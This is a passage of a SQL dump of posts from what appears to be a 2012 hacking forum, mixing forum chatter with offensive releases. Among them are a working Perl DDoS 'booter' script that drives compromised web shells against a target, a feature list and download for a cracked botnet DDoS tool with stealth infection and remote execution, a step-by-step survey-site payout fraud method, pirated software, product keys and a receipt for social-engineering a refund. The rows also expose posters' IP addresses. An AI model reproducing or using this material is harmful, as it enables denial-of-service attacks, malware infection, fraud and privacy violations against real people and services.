'1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1352249259', '9/10 Because i can see it now.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '10bfdf652b79e82e739b8ed3aad39012', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7154', '253', '1106', '56', 'RE: Count to 200', '0', '257', 'XxTREYZxX', '1352249347', '59. /me this is gonna take forever.', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '6208bc740bbc35c18acfccc99a0b12bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7155', '1120', '6523', '19', '[Junk]HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '1', 't3h jok3r', '1352249456', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7156', '1206', '7088', '35', 'RE: Sexy Girls Cool Wallpapers 1920 X 1200', '0', '62', 'R?????zo?', '1352254157', 'im sure it\'s worth :P but let me know', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6664fac9ca018c26915abe35d30f1fa3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7157', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '62', 'R?????zo?', '1352254351', '10/10 because your avatar is awesome haha, had me staring for like 2min', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '03ffc48e228acf3ab8784b8ae001a1cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7158', '1207', '7133', '35', 'RE: Rate these logos', '0', '82', 'iTzIpod', '1352254920', 'Thanks for your feedback Trey :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e94e5aa842a4ccd20e6bd1bfec4933de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7159', '1204', '7084', '3', 'RE: We are L33T', '0', '82', 'iTzIpod', '1352254966', 'I\'ve contributed a lot to that section! :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '826db99373bb3efe56b0ce243556d3e8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7160', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1352255050', '10/10 anime chicks are nice. I\'d tap that.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3e3110aac58cf57991ac751f4f1bbf70', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7161', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1352255094', 'What signature? Lol My signature is crap', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c795dac2b91c6280397fe348818a1acf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7162', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1352255125', 'Thanks for posting everyone, but I\'ve won. No need to post anymore.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e95e225bd67aff27eaea58c865a48dd3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7163', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1352255159', '60. Almost there guys. Almost there...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a724897feae86aeda64f0c0cd58c4460', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7164', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '82', 'iTzIpod', '1352255308', '@t3h jok3r, you should add credits to the OP who made those threads Credits to @iTzIpod (Me) @Timmy @spacefish36', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ccd50e7c5b821b7a7835a1468e27b9f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7165', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '5', 'Timmy', '1352256370', 'We reached 7,000 posts on the election day.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '21095edf7c52bacca56726d4d70608ce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7166', '1208', '0', '9', 'Steady $8 a Day [EXPLOIT]', '0', '5', 'Timmy', '1352257163', 'I have not tried this method therefore, I can not confirm it for you guys. If you guys do attempt this, feel free to post feedback! ^.^ [lock]PS: It work certain for US, possibly CA/UK How to make a quick 8$ a day {Atleast} The GPT Daily Survey Exploit In this guide, I will be teaching you how to use a URL exploit to make money in less than a minute. This has to be the simplest way to get free cash I know, and I’ve made over $150+ using this trick over the years. If I used it everyday, it would probably add up to $500+ since I found out about it. On to the guide.. First, login to the GPT website of your choice. I recommend http://www.prizelive.com/ or http://www.cashle.com/ Once you’re logged onto the GPT of your choice, head over to the offers and choose the category ‘Daily Surveys.’ Once you are there, look for any of the following offers: Opinions Here Lucky Surveys IDz Surveys Opinion Surveys MyThoughtsCount GiveUsYour2Cents Amp Surveys There are two different exploits, for the two different sets of offers. The first one I will be showing you works on Lucky Surveys, IDz Surveys, Opinion Surveys, and GiveUsYour2Cents. Step 1.) Open up the offer, you should be taken to an average looking survey site. The URL should say something along the lines of: http://...............aspx?pgtid=19 This exploit is SIMPLE, just simply change the number right after ?pgtid= (Usually 19) to 23 and when the next page loads, mark it as complete. It should approve shortly afterwards. Just saved yourself a lot of time, seeing as a lot of the time you take a 40 minute survey and do not qualify. MAKE SURE TO CLEAR YOUR COOKIES AFTER EACH OFFER! Now on to the other dailies. (Opinions Here, MyThoughtsCount, and AmpSurveys) These are usually the higher paying daily surveys. This exploit is a bit trickier, but can still be done with ease. Fill out your info until you start the survey, or the url says something similar to this: [code]http://www.opinionshere.com/SurveyFrame.aspx?user_id=%2fuFV6uCf0nl6zvdpcW6TPw%3d%[/code] See the part user_id=? Copy everything after the = sign and paste it in a blank notepad document or something similar. Now copy this link: [code]http://www.opinionshere.com/SurveyThankyou.aspx?survey_id=GbyvriN8jLs%3d&user_id=Yy9kGteElC6aCwcRFMqcKw%3d%3d[/code] Paste that in your URL box, but do not hit Enter or Go, instead, go back to the notepad document or what ever you used and copy the user ID you pasted there. Paste it into the URL box after user_id= Hit enter, wait for the page to load, and mark as complete. Hope you enjoy your free money![/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cd692cd384f7153f470c0d3eb5bb9e90', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7167', '1209', '0', '15', 'WinRAR cracked', '0', '5', 'Timmy', '1352257356', 'Hey... I bet you all are sick of seeing the \"Evaluation Version\" box everytime you open WinRAR, so many of you went to 7Zip or something like that... [align=center][size=x-large][b]That\'s why I bring you... [spoiler]THE WINRAR CRACK!!![/spoiler][/b][/size][/align] You can download it from: [lock][url=http://adf.ly/E0HtU]DOWNLOAD[/url][/lock] [align=center][size=x-large][b]AV Scans[/b][/size][/align] [url=http://adf.ly/E28WL]AV scan 1[/url] [url=http://adf.ly/E28ee]AV scan 2[/url] [url=http://adf.ly/E28hf]AV scan 3[/url] [url=http://adf.ly/E28k6]AV scan 4[/url]', '72.231.24.165', '1223104677', '1', '0', '5', '1352530815', '1', 'e825065623bea7d66d2691e00465dd6a', '0', '1352530815'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7168', '1210', '0', '21', '[Cracked] Dark DDoSer', '0', '5', 'Timmy', '1352257552', 'Here I have Dark DDoSeR 5.1 Cracked by The Old Warrior run at your own risk [img]http://img5.imageshack.us/img5/2596/8dcebcb1852e4d37a7adeaa.png[/img] [color=#FF0000]Client Features[/color] [spoiler] [-] Menu [+] Multi-Listen Socket Feature (Any Port) [+] Select # (Selects custom number of zombies) [+] Find IP (Locates and selects the IP in the listview) [+] Friends List (Keep yourself organized on who is truly your friend or foe) [+] DDoS History (Automatically keeps your victims saved) [+] Server Build (Create your server with personal settings) [++] Connect [+++] Host/DNS (DynDNS, no-ip, etc) [+++] Port (Chose any Port for server to connect) [+++] Reconnect Interval (sec) [+++] Registry Key (Startup) [+++] Registry Value (Startup) [+++] Mutex (Keep your server.exe from running again at the same time!) [+++] UPX Compression (Compress your .exe 60% smaller than normal size!) [++] Build [+++] Download server.exe [+] Options [++] Listview [+++] Change (.bmp) (Changes listview background to personal backgrounds) [+++] Remove (.bmp) (Choose to have no background in listview) [+++] Add/Remove Gridlines [+++] Color [++++] ForeColor (Change to custom color) [++++] BackColor (Change to custom color) [++] Form [+++] Theme [++++] Browse... (Change Theme of Client - Over 100 themes) [++++] Remove (Remove the theme - Compatible with Linux Wine) [+++] Text [++++] Font (Change to personal font) [++++] ForeColor (Change to custom color) [++++] BackColor (Change to custom color) [-] Commands [++] Show DNS (Show what DNS the server connects to) [++] DL/Execute (Download and execute a file on victim) [++] Update (Download and execute a file on victim, then uninstall) [++] Restart (Restart server - using temporary, auto-generated mutex) [++] Re-connect (Re-establishes connection with server) [++] Close (Exits process of server, does not remove registry) [++] Uninstall (Remove registry and disconnect server) [-] DDoS [+] Multi-threaded UDP Flood [+] SSYN Flood [+] HTTP Flood -> IP Address (Chose the host for attack) -> Port (Chose a custom Port) -> Type (Chose UDP or SSYN) -> Speed (Speed of attack) -> Size (Size of each Packet) -> Packets (Number of data sent) -> UDP Strength (Stable or Aggressive) -> Stop Timer (Automatically stop ddos after certain amount of seconds) -> Automatic Flood (floods in _ seconds, for _ seconds) -> Selected Only (Attack with only the selected zombies) --> Send Command (Start Attack) --> Stop Command (Stop Attack) [-] Statusbar (Located on bottom of client) [+] Status (Tells of lost connections, etc) [+] New Infections (Keeps track on # of new infections while client has been open) [+] Peak (Climax of zombies in listview) [+] Zombies Online [+] Time [-] Other [+] Works on all Windows (Including Vista, and Seven - Both 32 and 64 bit) [+] UAC Work-around (Won\'t prompt user - Registry -> Current User) [+] Stealth (Quietly runs on infected user\'s PC without prompt) [+] Ping Pong (Checks if the infected user is still responsive) [+] Instant Response (Infected users respond instantly) [+] Lifetime Membership and Updates! [+] Instant Access (As soon as you purchase, you will recieve access to Portal) [+] Membership to Portal (Change DNS, Serial, Password, etc) [+] ONLY $25! [+] Sleek GUI Change! [+] Cryptable ** [+] Strong, Reliable DDOS [+] 37.5 KB Stub; When compressed = 19.5 KB [/spoiler] [lock] [color=#00BFFF]vScan:[/color][url=http://adfoc.us/7778111152521]vScan for all you NOOBS[/url] [color=#1E90FF]Anubis Scan:[/color] [url=http://adfoc.us/7778111151733]Swag you are BlueDream[/url] [color=#0000CD]Download:[/color] [url=http://adfoc.us/7778111152467]Say Thanks :)[/url] [/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '03ea88246d14a7819e4566bc3a257ab7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7169', '1188', '6999', '35', 'RE: [Crack] Adobe CS6 Programs', '0', '5', 'Timmy', '1352257694', 'Thanks for the download and virus reports, you should use the lock mycode.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b726792a9071474fae283ab1e0160a8f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7170', '1211', '0', '18', 'Facebook Blaster Pro v10.0', '0', '5', 'Timmy', '1352257874', '[img]http://img6.imagebanana.com/img/73cmrgts/196461.jpg[/img] 1.Extract File On Desktop. 2.Install FaceBook Blaster Pro v10.0 3.Put Serial Key Info: http://www.facebookblaster.com/ Virustotal 0/42: https://www.virustotal.com/file/d97ab210405d9f3bcc055cefd6a716b19fc9430ebc290074780196beb206a0db/analysis/ [lock] Download: http://www7.zippyshare.com/v/70995165/file.html Key:LBACLFJEJMF9EDIRFS64[/lock]', '72.231.24.165', '1223104677', '1', '0', '1', '1352526859', '1', '3214939519381b7795a6744fb88310db', '0', '1352526859'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7333', '1243', '0', '68', 'Simple Perl Booter', '0', '8', 'spacefish36', '1352527014', 'Headnote: I wrote this a while back for my friend with someones help. They recently tested it, found there were a few modules that need installation. I don\'t know what they are, they seem to vary depending on system. -- Start Content -- I absolutely do not guarantee this to be in working condition. Usage: perl booter.pl 127.0.0.1 80 60 < shells.txt 127.0.0.1 is host. Can be dns, shells don\'t care. 80 is port. This is only used for \"tcp\" shells. 60 is time. This is how long it boots for. This goes for a divisible of 10 seconds, so 55 would boot for 60 seconds. shells.txt is a file with all your shells, and is in the following format. [code] tcp;http://bot.fak/shell.php udp;http://udpbot.fak/shell.php [/code] \"tcp\" shells are ones that ask for a port, time, and host. \"udp\" shells don\'t ask for port. If you need it adapted for additional use, such as shell booters (different from udp/tcp shells), putty booters, et al, just let me know. Following: The booter.pl file: [code] #!/usr/bin/perl use strict; use warnings; use HTTP::Request::Common; use HTTP::Request::Common::Post; use POE; use POE::Component::Client::HTTP; my @shells; while (<STDIN>) { push @shells, $_; } $ip = $ARGV[0]; $port = $ARGV[1]; $time = $ARGV[2]; if ($ip !~ m/.*?\\..*?\\..*?\\..*?/) { print \"ERROR: Must specify IP.\\n\"; die; } if ($port !~ m/\\d*?/) { print \"ERROR: Must specify PORT.\\n\"; die; } if (!$time) { $time = 15; } my @udpshells; my @tcpshells; foreach my $shell (@shells) { if ($shell =~ m/^udp;(.*)/) { push @udpshells, $1; } elsif ($shell =~ m/^tcp;(.*)/) { push @tcpshells, $1; } } my @url_list; foreach my $shell (@udpshells) { @url_list = (@url_list, ( POST $shell, Content => [ ip => $ip, time => 10 ] ) ); } foreach my $shell (@tcpshells) { @url_list = (@url_list, ( POST $shell, Content => [ host => $ip, port => $port, time => 10 ] ) ); } POE::Component::Client::HTTP->spawn(Alias => \'ua\'); sub got_response { my ($heap, $request_packet, $response_packet) = @_[HEAP, ARG0, ARG1]; my $http_request = $request_packet->[0]; my $tag = $request_packet->[1]; my $http_response = $response_packet->[0]; my $response_string = $http_response->as_string(); } sub _start { my $kernel = $_[KERNEL]; foreach my $i (0 .. $#url_list) { $kernel->post(\"ua\" => \"request\", \"got_response\", $url_list[$i], $i); } $time -= 10; if ($time > 0) { $kernel->delay(_start => 10); } } POE::Session->create(package_states => [main => [\"_start\", \"got_response\"]]); $poe_kernel->run(); [/code]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '9b596b744f713a9f2b46a191ba4a5028', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7171', '1212', '0', '30', 'Floristbooter v4.0.1 ~ Proof ~ Sleek Design ~ Custom Coded', '0', '5', 'Timmy', '1352258194', 'Here i have Floristbooter Thread on HF: http://www.h@ckforums.net/showthread.php?tid=2709475 [lock] [url=http://adf.ly/ETZPe]Click ME For Download[/url] [/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '77f8a2915d72e7d96f92dd89b1dd4782', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7172', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1352258290', 'Good job L33tHacking! :D Keep up the activity. Hoping Obama wins. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '88e499ea6e05774297f38b1e6bb928e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7173', '1213', '0', '34', 'Black Sleek Thread Design .PSD', '0', '9', 'p420', '1352258497', 'Preview: [img]http://i.imgur.com/5wMso.png[/img] [b] [color=#FF0000]Post to see link[/color][/b] [lock] http://adf.ly/ETZrU Have fun guys and if you download please thank the thread it helps:D[/lock]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '06596a1a6de7d6b86e9e7836ebfc0d34', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7174', '1214', '0', '43', 'Tons of PIDs', '0', '9', 'p420', '1352258706', 'Enjoy the PIDs. [lock]Ipad 2 DLXFF3HUDFJ0 DLXFF3JKDFJ0 DLXFF8KSDFJ0 DLXFF6MFDFJ0 DLXFF5SLDFJ0 DLXFF9HQDFJ0 DLXFF8HJDFJ0 DLXFF0HYDFJ0 Ipod Touch 8GB CCQDL2MTDCP7 CCQDL8CNDCP7 CCQDL4BLDCP7 CCQDL6MKDCP7 CCQDL5PCDCP7 CCQDL1HADCP7 CCQDL1KNDCP7 Xbox 360 America 15558444870305 15405744902305 15603043745305 15329625386305 15575873936305 15162942002305 Xbox 360 Europe 02758574483705 02684251870705 02794173541705 02602104088705 02653397205705 02964709008705 02807886700705 Logitech G15 BT23XGDG BT25RQDG BT77SHDG BT82RWDG BT22INDG BT35FODG [/lock]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '940edb3f1f62231fa8e8df6dfd19ac33', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7175', '1215', '0', '3', 'Post/PM Allowed for ACCOUNTS Only.', '0', '61', 'NXK', '1352258731', 'We have come to conclusion that it\'s only fair for accounts to be shared via the post/PM Method. The rule still stands for everything ELSE. We do not allow post/pm for methods/programs ETC. But for account giveaways We agreed that it\'s only fair to do so to prevent Leeching of accounts.', '99.252.235.12', '1677519628', '1', '0', '61', '1352258805', '1', 'ae4d159e4f3ecdfceb17f38703c2f114', '0', '1352258805'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7176', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '61', 'NXK', '1352258763', 'http://l33thacking.net/thread-1215.html', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '34cea18f252a0255e727402093d67a0d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7177', '1216', '0', '52', '[Release]Skype Resolver & GeoIP', '0', '9', 'p420', '1352259453', '[img]http://imgf.tw/503225830.png[/img] This is a Skype Resolver & GeoIP that I just made in Visual Studio for another site and thought it wouldn\'t be problem if I share it here too. [lock][url=http://www.mediafire.com/?esdealkfo76undz][img]http://imgf.tw/442197003.png[/img][/url][/lock]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '0366caf048410e3bc2341b2e2f0bb98d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7178', '1217', '0', '29', 'Win all paypal disputes!', '0', '1', 't3h jok3r', '1352259809', 'Though this one should be useful. [lock] [url=http://www.mediafire.com/view/?61e8z951opypfx4]Click here.[/url] [/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '429bb7d94abf9e262ed03bb82acb8b24', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7179', '1218', '0', '17', 'Camdecoy bitch available here', '0', '8', 'spacefish36', '1352260040', '[align=center] [b] [size=medium] Blonde Girl Picture: http://img526.imageshack.us/img526/2583/99699514.png Download: [lock] [url]http://adf.ly/ETbVP[/url] [/lock][/size][/b][/align]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ff79c1bc42630fc341b9ad38f5cb1ca1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7180', '1219', '0', '44', 'FIFA 13 Receipt', '0', '1', 't3h jok3r', '1352260181', 'Not sure how useful this will be to you guys, but if you want to try SE\'ing EA into a free copy of FIFA 13/Ultimate Edition, here\'s a real receipt you guys can use... :) [lock]http://www.mediafire.com/view/?y22wv5ilg012b56[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2255159c7b5a016904ad4d29bbf5b901', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7181', '1195', '7176', '47', 'RE: Premium Minecraft Accounts', '0', '324', 'Purps™', '1352263004', '[quote=\'NXK\' pid=\'7176\' dateline=\'1352258763\'] http://l33thacking.net/thread-1215.html [/quote] I\'m not using Post and PM me, I PM them. [hr] [quote=\'iTzIpod\' pid=\'7131\' dateline=\'1352236739\'] You haven\'t PMed me yet :p [/quote] Sorry, I Pmed you. :) [hr] [quote=\'VirtualLegend\' pid=\'7120\' dateline=\'1352230420\'] I Want to join this giveaway, need a MC account :D [/quote] PMed you also! :)', '67.181.154.90', '1135975002', '0', '0', '324', '1352263097', '1', '868b4f651daeb23acbf5729e424713df', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7182', '1196', '7070', '7', 'RE: Your favorite time of the year?', '0', '205', 'mothered', '1352263500', '[quote=\'R?????zo?\' pid=\'7070\' dateline=\'1352191916\'] Well my favourite time in the year is December (Yeah I know it\'s a month) but that\'s me and my gf\'s birthday with X-mas and New Year, it\'s just a full month partying :) [/quote] That\'s great to have multiple celebrations In the month of December. My family can\'t choose their birthday (the actual date) as their favorite time of year. My mum and my two brothers were born on February 29 (leap year).', '210.50.40.19', '-768464877', '1', '0', '205', '1352263523', '1', 'ebf780f05084d5571379415b6995af8b', '0', '1352263523'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7183', '1215', '7175', '3', 'RE: Post/PM Allowed for ACCOUNTS Only.', '0', '205', 'mothered', '1352263756', 'I was going to make a suggestion on this. Good move.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a83b7f4b7dfcac2d3620816cefda4240', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7184', '1195', '7181', '47', 'RE: Premium Minecraft Accounts', '0', '1', 't3h jok3r', '1352263997', '[quote=\'Purps™\' pid=\'7181\' dateline=\'1352263004\'] [quote=\'NXK\' pid=\'7176\' dateline=\'1352258763\'] http://l33thacking.net/thread-1215.html [/quote] I\'m not using Post and PM me, I PM them. [hr] [quote=\'iTzIpod\' pid=\'7131\' dateline=\'1352236739\'] You haven\'t PMed me yet :p [/quote] Sorry, I Pmed you. :) [hr] [quote=\'VirtualLegend\' pid=\'7120\' dateline=\'1352230420\'] I Want to join this giveaway, need a MC account :D [/quote] PMed you also! :) [/quote] He didn\'t say \"post here and pm me\" he said post/pm method :P', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '49f64a852dc9c0378ed29d2085debff0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7185', '1195', '7184', '47', 'RE: Premium Minecraft Accounts', '0', '324', 'Purps™', '1352265009', '[quote=\'t3h jok3r\' pid=\'7184\' dateline=\'1352263997\'] [quote=\'Purps™\' pid=\'7181\' dateline=\'1352263004\'] [quote=\'NXK\' pid=\'7176\' dateline=\'1352258763\'] http://l33thacking.net/thread-1215.html [/quote] I\'m not using Post and PM me, I PM them. [hr] [quote=\'iTzIpod\' pid=\'7131\' dateline=\'1352236739\'] You haven\'t PMed me yet :p [/quote] Sorry, I Pmed you. :) [hr] [quote=\'VirtualLegend\' pid=\'7120\' dateline=\'1352230420\'] I Want to join 